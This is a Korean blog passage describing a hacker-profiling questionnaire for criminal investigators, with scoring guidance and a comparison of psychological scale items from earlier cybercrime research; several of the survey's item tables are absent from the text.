3. 다음은 해킹기회에 대하여 알아보는 설문입니다. 귀하에게 해당되는 정도를 각각 매겨주십시오 (상대방의 동의를 얻은 모의해킹 등 제외)

 

4. 다음은 해킹기술의 학습에 대하여 알아보는 설문입니다. 귀하에게 해당되는 정도를 매겨주십시오

 

5. 다음은 처벌에 대한 생각 및 중간관리자에 의한 통제 등에 대한 설문입니다.

 

 

위와 같은 변인들이 영향을 주는 요인은 크게 해킹수행, 해킹에 대한 태도, 해킹의지가 있으며, 이에 대해서는 아래와 같은 척도문항으로 측정한다.

 

해킹수행

해킹 경험 : 자신에게 해당되는 항목에 표시해 주십시오

 

1. 해킹경험

 

2. 해킹빈도 (상대방의 동의를 얻은 모의해킹 등 제외)

 

3. 공격대상별 빈도 (상대방의 동의를 얻은 모의해킹 등 제외)

 

4. 주로 사용하는 공격방식

4-1. 해킹기법 중복 체크 가능(~번 번호 중 귀하가 주로 사용하는 기법에 체크)

시스템 및 서비스 설정 취약점 이용 : 파일시스템 쓰기권한 취약점, 서버 및 서비스 권한설정 버그, 패스워드 크래킹 등

프로그램상 취약점 이용 : 스크립트 언어 취약점, 버퍼 오버플로우, 힙 오버플로우, Race Condition 등 프로그램상 보안문제를 활용, 각종 보안도구 회피, Code Injection, SQL Injection

프로토콜 취약점 이용 : TCP, ICMP, ARP, RARP, UDP 등 설계상 취약점 이용 패킷 스니핑, IP Spoofing, Session Hijacking, Packet Redirecton, Routing Table 변경, ARP Spoofing

시스템 정보수집 : 취약점 분석도구 혹은 시스템 명령어 등을 이용하여 시스템 정보 수집

서비스거부 공격 : DoS, DDoS, DRDoS, Smurfing, Tear Drop, 암호화된 DDoS, Botnets

악성코드 제작·배포 : 바이러스, Trojan, Backdoor, Worm, Web Shell, 랜섬웨어 등

기타 : 사용자 도용, Phishing, 스팸, 사회공학 기법, Exploit kits

 

4-2. 공격도구 자체제작 여부 : 자체제작 / 타인코드 수정 / 타인코드 그대로 사용

 

4-3. 악성프로그램 구매 경험 : 있다 / 없다

 

4-4. 현장운영 방식

1) 조직화 : 나는 해킹조직에 소속되어 있다 / 난 개인적으로만 활동한다 / 때때로 다르다

2) 내가 (조직/개인)으로 해킹을 하는 이유는 ( )이다.

3) 내가 소속된 조직명은 ( )이다.

4) 나의 조직 내 담당역할은 ( )이다.

5) 다음은 추적방해 및 시그니처 사용에 대한 설문입니다.

 

4-5. 1회 공격에 투자한 평균시간

1) 기간 : 1일 이하 / 1주일 이하 / 1개월 이하 / 3개월 이하 / 6개월 이하 / 그 이상

2) 주로 작업한 시간대 : 오전 / 오후 / 심야

 

5. 다음은 해킹효과에 대한 설문입니다. 귀하에게 해당되는 정도에 각각 표시하여 주십시오

3) 나의 공격이 상대방에게 탐지된 시점 : 사전탐지 / 사후탐지 / 탐지되지 않음 / 모름

 

6. 다음은 해킹동기에 대한 설문입니다. 귀하에게 해당되는 정도에 각각 표시하여 주십시오 (상대방의 동의를 얻은 모의해킹 등 제외)

6-1. 최적경험(Flow)

 

6-2. 해킹동기별 빈도

 

7. 다음은 공격대상 선정방법에 대한 설문입니다.

 

 

해킹에 대한 태도

 

1. 다음은 해킹에 대한 태도를 알아보는 설문입니다. (상대방의 동의를 얻은 모의해킹 등 제외)

 

2. 다음은 화이트해커의 필요요소에 대해 중요하게 생각하는 정도를 알아보는 설문입니다.

 

3. 해킹기술을 이용한 향후 계획은 무엇인가요 중복 체크 가능(답변 생략 가능)

사이버수사관 보안전문가 전문강사 및 교수 블랙해커 취미 기타( )

 

 

해킹의지

해킹에 대한 의지

1. 다음은 해킹행위에 대한 의도를 알아보는 설문입니다. 귀하에게 해당하는 번호를 기재해주세요

나는 내 목적(단순재미 포함)을 달성하기 위해서, 나의 능력과 지식을 가지고 허가되지 않은 정보시스템에 접근할 의향이 있다(현재)

나는 내 목적(단순재미 포함)을 달성하기 위해서, 나의 능력과 지식을 가지고 허가되지 않은 정보시스템에 접근할 의향이 있었다(과거)

나는 능력과 지식을 가지고 있지만, 이러한 기술들을 합법적으로 허가가 된 경우에만 사용할 의향이 있다

나는 내가 가진 능력과 지식을 활용하여 허가되지 않은 정보시스템에 접근할 의향이 있으나, 오로지 타인에게 피해를 주지 않는 공익적인 목적(피해확산 방지, 연구 등)으로만 접근할 것이다

어느 문장도 해당사항이 없다

위 항목을 선택한 이유(생략가능) : ( )

 

2. 다음은 해킹행위에 대한 의지를 알아보는 설문입니다. (상대방의 동의를 얻은 모의해킹 등 제외)

 

 

 

2. 해커 프로파일링 FTF Interview 설문문항 활용 방법

 

본 척도를 활용하여 해커가 스스로 자기기입식으로 응답하도록 한 후 그 결과를 다른 정보들(피의자 신문조서, 수사보고, 악성프로그램 분석보고서 등)과 함께 연계분석함으로써, 해커에 대한 정확한 유형 분류 및 프로파일링을 할 수 있을 것으로 기대된다. 해킹 기술에 대해 잘 알지 못하는 수사관에게는 일종의 가이드가 될 수 있을 것이다.

보다 정확한 프로파일링이 필요하거나 해커가 척도설문에 대한 응답을 거부하는 등 필요시 본 척도를 활용하여 해커와의 심층 인터뷰를 할 수 있다. 이 때에는 먼저 해커와의 신뢰감(rapport)을 형성하는 것이 중요하며, 설명요인별로 자연스럽게 질문하고 서술형 답변을 기록한 후, 면담을 마치고 각 요인별 분석결과를 정리하는 방법을 취한다.

위 척도문항의 응답결과에 대한 해석방법은 다음과 같다. 아래 기술한 사항 외에는 요인별 합산평정점수를 바탕으로 한 결과분석이 불요하고, 각 문항별로 직관적인 해석이 가능하다. 인성요인 중 공격성(aggression)을 측정하기 위한 4개 문항의 경우 4 척도로 이루어져 있으며, 4개 문항의 합산평정점수가 높을수록 공격성이 높다고 판단할 수 있다. 자긍심(self-esteem)은 긍정문항(정코딩)1, 2, 4, 6, 7, 10번째 문항과 부정문항(역코딩)3, 5, 8, 9번째 문항을 의도적으로 함께 사용하여 4점 척도로 응답하도록 하였는데, 역코딩한 문항에 대해서만 점수를 역배점하여 정코딩 문항의 점수와 합산평정함으로써 자긍심을 수치화할 수 있도록 하였다(전병재, 1974). 합산평정점수가 높을수록 자긍심이 높다고 판단할 수 있다. 부주의한 응답행태를 환기시키고 무비판적으로 질문에 순응하는 행태를 완화하는 긍정적인 역할을 하는 장치로서 역코딩을 활용하였다(고길곤, 탁현우, 강세진, 2015). 자아의식(self-consciousness)15번째 문항인 공적 자아의식 측정문항과 610번째 문항인 사적 자아의식 측정문항으로 구분하여 5점 척도로 응답하도록 하였으며, 각각 합산평정점수가 높을수록 해당 자아의식이 높은 것으로 판단할 수 있다. 애국심(patriotism)4점 척도의 4개 문항으로 합산평정점수가 높을수록 애국심으로 가득 차 있다고 할 수 있으며, 윤리의식(ethics)5점 척도의 4개 문항으로 구성하여 부정문항1, 2번째 문항에 대해서는 역배점하여 긍정문항인 3, 4번째 문항의 배점과 합산평정하는 방식으로 측정한다. 마지막으로 자기통제력(self-control)은 충동성에 대한 1, 2번째 문항, 위험추구성에 대한 3, 4번째 문항, 활동성에 대한 5, 6번째 문항, 단순작업 추구성에 대한 7번째 문항, 이기성에 대한 8번째 문항, 화기질에 대한 9번째 문항에 대하여 모두 역배점하여 7점 척도의 합산평정점수가 높을수록 자기통제력이 높다고 볼 수 있다.

지성·기술적 능력에 대한 척도문항 중 해킹능력(종합)1번째 선택지가 고도의 해킹 기술을 보유하고 있는 것을 의미하며, 8번째 선택지를 선택한 경우 가장 낮은 해킹 기술을 보유하고 있다고 해석한다.

사회적 요인에 대한 척도문항은 전부 5점 척도로 구성되어 있는데, 주위일상긴장에 대해서는 6개 문항의 합산평정점수가 높을수록 부모, 학교, 직장 등 주위관계에서 긴장을 하고 있다고 볼 수 있다. 주변의 인식에 대해서는 해커들은 스스로 해커라고 불리우는 사실에 대해 긍정적인 감정을 갖는다는 선행연구에 따라, 1번째 문항인 주변 사람들은 나를 해커라고 부른다2, 3, 4, 5번째 주변 사람들은 나를 문제아라고 생각한다문항을 구분하여 각각 주위낙인에 대하여 판단해야 한다. 25번째 문항에 대한 응답은 합산평정점수가 높을수록 주위로부터 부정적 낙인이 찍혀있다고 판단할 수 있다. 해킹에 대한 인식에 대해서는 차별강화-보상 관련 3개 문항(13번째)과 차별강화-비용(주위손실인지) 관련 3개 문항(46번째)으로 구성되었으므로, 합리적 선택이론에 따른 이득-손실을 계산하기 위하여 13번째 문항의 합산평정점수에서 46번째 문항의 합산평정점수를 뺀 값을 이용한다. 계산된 점수가 높을수록 해킹이 손해보다 이득이 많다고 판단하는 것이라고 볼 수 있다.

환경적 요인은 5점 척도로 사이버하위문화에 대한 3개 문항(1~3번째)과 네티즌 참여통제 관련 1개 문항(4번째)으로 구성되어 있으며, 사이버하위문화에 대한 문항응답의 합산평정점수가 높을수록 해킹에 대해 관대한 문화 속에 있다는 것을 의미하고, 네티즌 참여통제 문항은 응답점수가 높을수록 구성원들이 스스로 사이버범죄 행위에 대해 제재를 하고 있다고 볼 수 있다.

상황기회 요인 중 해킹 기회 관련 범죄위험노출과 범죄의 용이성, 익명성에 대한 3 문항응답의 합산평정점수가 높을수록 해킹에 대한 기회가 많음을 의미하고, 해킹기술의 학습 관련 3개 문항응답의 합산평정점수가 높을수록 인터넷을 통해 해킹을 모방하려는 특성을 가진다고 할 수 있다. 공식처벌과 관련 4개 문항의 응답에 대한 합산평정점수가 높을수록 처벌의 확실성과 엄격성 인지가 높다고 판단할 수 있다.

결과요소에서 해킹동기 중 최적경험 지수(flow index)는 도전-능력균형, 집중력, 자의식상실, 자기만족감 8개 문항의 합산평정점수가 높을수록 해킹에 대해 몰입성이 높다고 볼 수 있으며, 해킹에 대한 태도는 5개 문항 중 1, 2, 3, 5번째 문항이 역코딩되었으므로 역배점하여 합산평정한 점수가 높을수록 해킹에 대한 윤리의식이 높다고 할 수 있다.

 

 

참고문헌

고길곤, 탁현우, 강세진. (2015). 설문조사에서 문항의 역코딩 여부가 응답결과에 미치는 영향: 자아존중감과 자기효능감 측정 사례를 중심으로. 한국행정학보, 49(3), 515-539.

전병재. (1974). Self-esteem: A test of its measurability. 연세논총, 11, 109-129.

반응형
Posted by CCIBOMB
반응형

사이버범죄자(해커) 프로파일링 관련 척도문항 비교·분석

 

척도문항을 선정하기 위하여 해커 프로파일링(hacker profiling), 해커들의 심리변인에 기반한 해킹타입 예측, 사이버범죄자의 행동과 성격특성간 상관관계, 사이버범죄 유형별 원인 및 통제요소, 화이트칼라직종 종사자들의 범죄의도와 그 요인, 범죄자 프로파일링에 관한 연구 등 관련 문헌들을 참조하여, 다음의 절차를 수행하였다.

우선 첫째로 Jakub LICKIEWICZ(2011)‘Cyber crime psychology proposal of an offender psychological profile’에서 이론적인 연구를 통하여 제안한 ‘Theoretical model profile of a hacker’의 변인들을 선별하고, 둘째로, 기존의 외국문헌과 한국문헌에서 사이버범죄, 특히 해킹행위에 영향을 미친다고 밝혀진 변인들을 선별하였다. 그 분류한 결과가 다음 표에 제시되어 있다.

비교된 연구들은 Marcus K. Rogers, Kathryn Seigfried & Kirti Tidke(2006)Self-reported computer criminal behavior: A psychological analysis, Rashimi Saroha(2014)Profiling a cyber criminal, Pamela, Elizabeth, Marc & Kathryn(2008)Why do they do it?: the Motives, mores, and character of white collar criminals, Woo(2003) The hacker mentality: Exploring the relationship between psychological variables and hacking activities, Beebe & Guynes(2006)A model for predicting hacker behavior, 임정호(2003)의 화이트칼라직종 종사자들의 범죄의도와 그 요인에 관한 연구, 박찬현 등(2016)의 해커들의 심리변인에 기반한 탈선적 해킹활동 및 해킹타입 예측 모델, 김성은, 박산하, 김진석(2014)의 청소년 사이버일탈과 관련변인의 탐색, 한국 형사정책 연구원(2008)의 청소년 사이버범죄 유형별 원인 및 통제요소에 관한 연구, 양계민(2002)범죄 청소년 유형에 대한 Moffit 이론의 검증 및 척도개발, 우형진(2004)의 해커의 심리변인이 해킹행위에 미치는 영향에 관한 연구, 이성식(2012)의 사이버범죄의도에 대한 공식처벌의 억제효과, 백승익 등(2007)의 사이버 윤리지표 개발에 관한 실증연구, 이윤호, 김도우(2011)의 사이버범죄와 보안의식에 대한 연구 등이었다.

 

. 사이버범죄(해킹)에 영향을 주는 요인들에 대한 평가지표 비교

변인(척도문항 수)

척도

변인

Jakub LICKIEWICZ(2011)

Rashmi Saroha(2014)

Pamela H. Bucy (2008)

Markus K. Roger(2006)

개인수준

생물학적 요인

- 트라우마

- 유전적 공격성

- 의료이력

- 신체특징

외부환경 요인

- 부모관계

- 형제자매관계

- 동료관계

- 학교환경

- 전문작업

지성

- 추론능력

- 분석기술

- 엄격한 마음

인성

- 사회적 불안

- 내향성/외향성

- 경험에 대한
개방성

- 양심

- 순응성

- 애국심

기술적 능력

- 파일시스템,
운영체제,
프로그래밍언어에 대한 지식

- 스크립트 작성

 

 

 

기술적 노하우

- 소프트웨어에
대한 기술적지식

- 장비 탐구
(지적인, 목표 지향적인, 창의적인, 기술적인, 잘 훈련된 등 14개 분류)

 

 

 

인성적 특질

- 유전적 심리기질
(성급한, 단호한, 둔감한, 공격적, 강한의지, 열정적인, 이기적인 등 25개 분류)

 

인성적 특징

- 통제 필요성

- 따돌림

- 카리스마

- 실패 두려움

- 순수성 부족

- 자기애

- 사회적양심 부족

- 야망

 

성별(1)

나이(1)

대학(1)

인종(1)

전공(1)

Big-5 성격유형

부정적 태도척도

- 내적

- 사회적

- 쾌락주의적

도덕적 의사결정

주위관계수준

사회적 능력

- 규범 내면화

- 타인과의 관계

- 규범 적응성

사회적 특징

- 범죄의도에
영향주는 요인
(사회적능력이 부족한, 급진적인, 반사회적인 등 21개 분류)

타인과의 관계

- 지도자/추종자

 

사회문화수준

 

 

기업문화

- 회사정책

- 보상정책

- 감사 등

 

상황기회수준

인터넷 중독

- 인터넷 유지시간

- 인터넷 활동내용

 

 

 

범죄수행

해킹동기

- 경제적, 호기심, 지루함, 인지적, 복수심

피해자 선정방법

- 면식/비면식

- 동기 준수

공격방식

- 사회공학적/
기술적

- 단순/복잡

- 알려지지않은/알려진방식

공격효과

- 시스템 파괴

- 공격탐지여부

- 공격목표달성

현장운영방식

- 조직/비조직

- 추적방해

- 데이터 검색방식
(특정/임의)

해킹동기

- 경제적, 정치적, 감정적, 종교적 등 21개 분류)

범죄동기

- 지도자: 욕심

- 추종자: 믿음,
두려움 등

컴퓨터 범죄지수

척도

변인

이성식(2008)

이윤호 등(2011)

백승익(2007)

이성식(2015)

개인수준

나이(1)

가족수입(1)

학업(2)

윤리의식(7)

자기통제력(9)

- 충동성

- 위험추구성

- 현재지향성

- 무계획성

성별(1)
나이(1)

컴퓨터숙련도(1)

보안의식(4)

보안툴 이용(3)

성별(1)

나이(1)

사생활보호 민감도

정보정확성 인식

지적재산권 이해

정보 접근성 이해

- 시나리오(3)

성별(1)

나이(1)

자기통제력

- 충동성(2)

- 위험추구성(2)

- 단순작업 추구성(2)

- 활동성(2)

- 이기성(2)

- 화기질(2)

주위관계수준

부모와의 유대(4)

 

 

차별강화(3)

비용(3)

사회문화수준

 

 

 

모방(3)

법위반정도(3)

상황기회수준

처벌의 확실성(1)

컴퓨터이용시간(1)

컴퓨터이용시간(1)

법위반자 차별접촉(1)

범죄기회

- 범죄용이성(2)

- 익명성(1)

범죄수행

 

유형별 피해경험(2)

 

유형별 지난1년간
범죄경험

범죄의도

사이버범죄의도(1)

 

행동의도

- 시나리오(4)

 

범죄에 대한 태도

 

 

 

법위반의 정의(1)

척도

변인

양계민(2002)

Woo(2003)

우형진(2004)

이성식(2012)

개인수준

비행경험(9)

- ,퇴학 경험

- 불량서클 가입 등

성별(1)

나이(1)

종교(1)

인종(1)

교육(1)

언어(1)

자기애(16)

애국심(5)

공격성(10)

- 공격적 성격

- 공격적 반응

해킹대회(3)

애국심(5)

공격성(10)

- 공격적 성격

- 공격적 반응

성별(1)

나이(1)

가족수입(1)

자기통제력

- 충동성(2)

- 위험추구성(2)

- 단순작업 추구성(2)

- 활동성(2)

- 이기성(2)

- 화기질(2)

개인윤리의식(2)

주위관계수준

가정관련 준거(7)

- 부모와의 관계

- 부모 경찰검거 경험

- 출산연령 등

 

 

 

사회문화수준

 

 

 

공식처벌인지(1)

상황기회수준

친구관련 준거(3)

- 범죄친구 등

 

 

익명성(1)

범죄수행

 

해킹빈도(22)

해킹동기(8)

최적몰입경험

- 도전능력균형(4)

- 집중력(4)

- 자의식상실(4)

- 자기만족감(4)

해킹빈도(2)

해킹유형(12)

최적몰입경험

- 도전능력균형(4)

- 집중력(4)

- 자의식상실(4)

- 자기만족감(3)

사이버범죄유형별 횟수(1)

범죄의도

 

타국에 대한 해킹의지(5)

타국에 대한 해킹의지(5)

 

 

척도

변인

김성은 등(2014)

임정호(2003)

박찬현 등(2016)

이성식(2008)

개인수준

성별(1)

교사교우관계(10)

학업성적(5)

공격성(2)

자기통제력(24)

- 충동성

- 위험추구성

- 단순과제 선호

- 육체활동 선호

- 자기 중심성

- 화내는 기질

성별(1)

연령(1)

학력수준(1)

전문성(1)

윤리성향(20)

공격성(10)

위험감수성향(20)

Big-5성격유형(20)

부정적 감정(2)

낮은 자금심(10)

자기통제력(9)

개인윤리의식(3)

주위관계수준

공학여부(1)

학교소재지(2)

사회적 태도(14)

 

주위일상긴장(2)

범죄친구접촉(2)

주위낙인(3)

부모와의 유대(4)

사회문화수준

 

 

 

사이버하위문화(1)

네티즌참여통제(1)

상황기회수준

컴퓨터사용시간(1)

PC방 이용(1)

게임 이용(1)

성인물 이용(1)

범죄기회상황(3)

(이익, 위험성, 부담)

 

익명상황(1)

이득(4)

인터넷사용시간(1)

중간관리자통제(1)

범죄수행

허위사실 유포(1)

개인정보 도용(1)

해킹(1)

 

해킹빈도(3)

해킹활동유형(22)

최적몰입경험(20)

유형별 해킹경험(16)

범죄의도

 

범죄의도(1)

해킹의도(1)

 

범죄에 대한 태도

 

 

해킹에 대한 태도(4)

 

 

위와 같이 Jakub LICKIEWICZ(2011)의 변인, 사이버범죄 수행에 영향을 주는 변인, 해커의 해킹활동 예측지표, 화이트칼라 범죄자의 특징 등 공통적으로 포함된 변인들을 비교하였다. 그 결과 해킹에 영향을 줄 수 있는 변인들을 크게 개인수준, 주위관계수준, 사회문화수준, 상황기회수준으로 분류하였다. 개인수준에는 인구통계학적 요인(성별, 나이, 지역 등), 인성적 요인(공격성, 자긍심, 자아의식, 애국심, 윤리의식, 자기통제력), 지성·기술적 요인(학력, 전공, 기술적능력 등)을 포함하였고, 주위관계수준에는 사회적 요인(일상긴장, 주변인식, 해킹에 대한 인식), 사회문화수준에는 사이버하위문화와 네티즌참여통제 요인, 상황기회수준에는 범죄친구접촉, 인터넷중독, 범죄기회를 포함하였다.

 

 

참고문헌

Beebe N.L. and Guynes. J. (2006). A model for predicting hacker behavior. in Proc. AMCIS, 409, Acapulco, Mexico,

Jakub Lickiewicz. (2011). Cyber crime psychology proposal ofan offender psychological profile. Problems of Forensic Sciences. LXXXVII, 239-252.

Marcus K. Rogers, Kathryn Seigfried and Kirti Tidke. (2006). Self-reported computer criminal behavior: A psychological analysis. digital investigation, 3S, S116-S120.

Pamela H. Bucy, Elizabeth P. Formby, Marc S. Raspanti, Kathryn E. Rooney. (2008). Why Do They Do It?: The Motives, Mores, and Character of White Collar Criminals. St. John's Law Review, 82(2), 401-572.

Rashmi Saroha. (2014). Profiling a Cyber Criminal. International Journal of Information and Computation Technology, 4(3), 253-258.

Woo H.J. (2003). The Hacker Mentality: Exploring the Relationship between Psychological Variables and Hacking Activities. Doctor of Philosophy, Athens, Georgia.

김성은, 박산하, 김진석. (2014). 청소년 사이버 일탈과 관련변인의 탐색: 다층 포아송모형의 적용. 교육학연구, 52(1). 147-168.

박찬현, 송인욱, 김민지, 장은희, 허준, 김현택. (2016). 해커들의 심리변인에 기반한 탈선적 해킹활동 및 해킹타입 예측 모델. 한국통신학회논문지, 41(4), 489-498.

백승익, 조남재, 이인, 강진우, 김봉준. (2007). 사이버 윤리지표 개발에 관한 실증연구. 정보화정책, 14(1), 85-101.

양계민. (2002). 범죄 청소년 유형에 대한 Moffit 이론의 검증 및 척도개발. 중앙대학교 대학원 박사학위논문,

우형진. (2004). 해커의 심리변인이 해킹행위에 미치는 영향에 관한 연구. 한국언론학회보, 43(3), 90-115.

이성식, (2012), 사이버범죄의 유형별 원인으로 본 인터넷 윤리대책, Internet and Information Security, 3(1), 3-18.

이윤호, 김도우. (2011). 사이버범죄와 보안의식에 대한 연구. 산업보안연구학회논문지, 2(2), 3-24.

임정호. (2003). 화이트칼라직종 종사자들의 범죄의도와 그 요인에 관한 연구. 서강대학교 교육대학원 석사학위논문.

형사정책연구원. (2009. 11. 30). “검찰 범죄통계업무 개선방안 연구
http://www.prism.go.kr/homepage/researchCommon/downloadResearchAttachFile.do;jsessionid=E73A5DAA8600F5905F33AF6A823C2DC1.node02?work_key=002&file_type=CPR&seq_no=001&pdf_conv_yn=N&research_id=1280000-201000016

반응형
Posted by CCIBOMB